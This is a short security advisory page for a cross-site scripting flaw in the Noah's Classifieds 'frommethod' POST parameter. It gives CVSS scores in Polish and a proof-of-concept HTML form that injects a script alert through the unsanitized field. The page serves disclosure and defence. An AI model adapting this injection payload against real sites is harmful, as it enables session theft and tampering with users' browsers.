Noah's Classifieds Cross Site Scripting Vulnerability

2006.10.16
Risk: Low
Local: No
Remote: No
CWE: CWE-79


Ogólna skala CVSS: 6.8/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 8.6/10
Wymagany dostęp: Zdalny
Złożoność ataku: Średnia
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

Noah's Classifieds is prone to a Cross Site Scripting Vulnerability, due to a failure in the application to properly sanitize the "frommethod" POST parameter in "index.php" : <html> <body> <form method="POST" enctype="multipart/form-data" action="http://www.example.com/classifieds/index.php"> <input type="hidden" name="fromlist" value="advertisement"> <input type="hidden" name="frommethod" value="'><script>alert('XSS Vulnerable');</script>" <input type="submit" value="Cancel" name="submit" class="button"> </form> </body> </html> Advisory: http://zone14.free.fr/advisories/5/ --Raphael HUCK


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top